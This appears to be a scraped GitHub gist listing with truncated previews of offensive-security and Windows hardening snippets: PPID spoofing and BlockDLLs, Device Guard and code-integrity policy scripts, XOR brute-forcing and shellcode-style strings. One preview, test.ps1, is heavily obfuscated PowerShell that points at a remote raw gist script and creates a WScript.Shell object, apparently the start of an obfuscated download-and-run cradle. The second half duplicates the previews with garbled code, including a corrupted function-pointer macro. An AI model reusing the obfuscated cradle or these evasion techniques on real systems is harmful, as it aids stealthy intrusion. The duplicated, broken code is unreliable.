InvokeThreatGuy invokethreatguy

## PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

## loaded_psp_drivers.cpp
#include <Windows.h>
#include <ImageHlp.h>
#include <strsafe.h>
#include "loaded_psp_drivers.h"

#include <set>
#include <string>
#include <algorithm>

#pragma comment(lib, "crypt32.lib")

## gist:1a9996a792f0172918912bdbedc33e1a
; A minimal Mach-o x64 executable for OS X (also see below Mountain Lion version)
;
; $ nasm -f bin -o tiny_hello tiny_hello.s
; $ chmod +x tiny_hello
; $ ./tiny_hello
; Hello World!
; $

; c.f.
; http://osxbook.com/blog/2009/03/15/crafting-a-tiny-mach-o-executable/ ( the original tiny mach-o executable )

## enable_win_guard.ps1
# Enable Required Windows Features
Enable-WindowsOptionalFeature -Online -NoRestart -FeatureName:Microsoft-Hyper-V-Hypervisor -All
Disable-WindowsOptionalFeature -Online -NoRestart -FeatureName: Microsoft-Hyper-V-Tools-All, Microsoft-Hyper-V-Services
Get-WindowsOptionalFeature -Online -FeatureName "IsolatedUserMode" | Enable-WindowsOptionalFeature -Online -NoRestart

# Enable DeviceGuard Security Flags
#reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType "DWORD" -Value 1 -Force

# Info Source: https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security#use-registry-keys-to-enable-vbs-and-device-guard

## dg.ps1
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d  = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
$s2.Delete()
Remove-Item -Path C:\scpy -Force
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force

## CIPolicyParser.ps1
# Ensure System.Security assembly is loaded.
Add-Type -AssemblyName System.Security

function ConvertTo-CIPolicy {
<#
.SYNOPSIS

Converts a binary file that contains a Code Integrity policy into XML format.

Author: Matthew Graeber (@mattifestation)

## test.ps1
Set-Item Variable:\p 'Notepad';Set-Variable v5 'HKCU:\Software\Microsoft\Notepad';Set-Item Variable:\Ma 'https://gist.githubusercontent.com/invokethreatguy/0481730897e4c0db74f6596fcae223f9/raw/c2a3ebbfa3e7ffcfaf2d4ad2985a8ffd2dca3a4b/get-process.ps1';pushd;SI Variable:/3eT (.$ExecutionContext.InvokeCommand.GetCommand($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComObje WScript.Shell);$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|?{(Variable _ -Va).Name-like'L*ame'}|%{(GV _ -ValueOnl).Name}|Select  -Fir 1).Invoke('System.Windows.Forms');Set-Variable A (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))(Get-Variable v5).Value);@(@(((.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))HKCU:\Software\Microsoft\Notepad|Memb

## XORBruteForce.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;

namespace XORBruteForce
{
    class Program
    {

## dashboard-5c5ee7780849a005a92cb1a6.json
gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437

## x86_relative_shellcode_strings.c

#include <stdio.h>

#define DECLARE_STRING(var, str)  __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
#define REF_STRING(var) ((char*(*)())var)()

DECLARE_STRING(data1, "Hello, World!\n");
DECLARE_STRING(data2, "Goodbye, World!\n");

int main(int , char** )
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{
	#include <Windows.h>
	#include <ImageHlp.h>
	#include <strsafe.h>
	#include "loaded_psp_drivers.h"

	#include <set>
	#include <string>
	#include <algorithm>

	#pragma comment(lib, "crypt32.lib")
	; A minimal Mach-o x64 executable for OS X (also see below Mountain Lion version)
	;
	; $ nasm -f bin -o tiny_hello tiny_hello.s
	; $ chmod +x tiny_hello
	; $ ./tiny_hello
	; Hello World!
	; $

	; c.f.
	; http://osxbook.com/blog/2009/03/15/crafting-a-tiny-mach-o-executable/ ( the original tiny mach-o executable )
	# Enable Required Windows Features
	Enable-WindowsOptionalFeature -Online -NoRestart -FeatureName:Microsoft-Hyper-V-Hypervisor -All
	Disable-WindowsOptionalFeature -Online -NoRestart -FeatureName: Microsoft-Hyper-V-Tools-All, Microsoft-Hyper-V-Services
	Get-WindowsOptionalFeature -Online -FeatureName "IsolatedUserMode" \| Enable-WindowsOptionalFeature -Online -NoRestart

	# Enable DeviceGuard Security Flags
	#reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
	New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType "DWORD" -Value 1 -Force

	# Info Source: https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security#use-registry-keys-to-enable-vbs-and-device-guard
	$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
	$s2 = gwmi Win32_ShadowCopy \| ? { $_.ID -eq $s1.ShadowID }
	$d = $s2.DeviceObject + "\"
	cmd /c mklink /d C:\scpy "$d"
	New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
	$s2.Delete()
	Remove-Item -Path C:\scpy -Force
	Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
	ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
	Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
	# Ensure System.Security assembly is loaded.
	Add-Type -AssemblyName System.Security

	function ConvertTo-CIPolicy {
	<#
	.SYNOPSIS

	Converts a binary file that contains a Code Integrity policy into XML format.

	Author: Matthew Graeber (@mattifestation)
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.Linq;
	using System.Text;

	namespace XORBruteForce
	{
	class Program
	{

	#include <stdio.h>

	#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
	#define REF_STRING(var) ((char()())var)()

	DECLARE_STRING(data1, "Hello, World!\n");
	DECLARE_STRING(data2, "Goodbye, World!\n");

	int main(int , char** )